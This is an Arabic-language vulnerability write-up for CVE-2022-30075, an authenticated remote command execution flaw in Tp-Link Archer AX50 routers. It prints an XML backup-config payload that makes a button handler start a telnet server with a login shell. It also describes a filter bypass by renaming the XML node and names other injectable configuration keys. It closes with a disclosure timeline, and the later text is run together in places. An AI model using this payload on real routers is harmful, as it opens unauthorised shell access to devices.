
Tp-Link Archer AX50 ثغرة RCE مُوثَّقة (CVE-2022-30075)
تنفيذ الأوامر عن بُعد مع المصادقة في راوترات Tp-Link
إذا كان راوتر Tp-Link الخاص بك يدعم وظيفة النسخ الاحتياطي والاستعادة، وكان إصدار البرنامج الثابت أقدم من يونيو 2022، فمن المحتمل أن يكون عرضة للخطر.
Tp-Link Archer AX50، قد تستخدم راوترات tplink الأخرى تنسيقًا مختلفًا للنسخ الاحتياطي، ويجب تعديل الثغرة الاستغلالية.
استخدام الثغرة الاستغلالية لتشغيل خادم telnet على الراوتر

<button name="led_switch">
<action>pressed</action>
<button>ledswitch</button>
<handler>/lib/led_switch</handler>
</button>
<button name="exploit">
<action>pressed</action>
<button>ledswitch</button>
<handler>/usr/sbin/telnetd -l /bin/login.sh</handler>
</button>
system.button.handler، ولكن يمكن تجاوزه بسهولة بتغيير اسم العقدة الأصلية في XML (مثل name="exploit")system.button.handler، بل أيضًا باستخدام ddns.service.ip_script، firewall.include.path، uhttpd.main، وغيرها.../usr/sbin/telnetd -l /bin/login.shtelnet 192.168.1.115.03.2022 - تم اكتشاف الثغرة 15.03.2022 - تم الاتصال بدعم Tp-Link 16.03.2022 - تم تلقي رد من Tp-Link 02.05.2022 - تم تعيين رقم CVE 27.05.2022 - أصدرت Tp-Link إصدار برنامج ثابت يحتوي على إصلاح للثغرة 07.06.2022 - تم نشر التفاصيل الفنية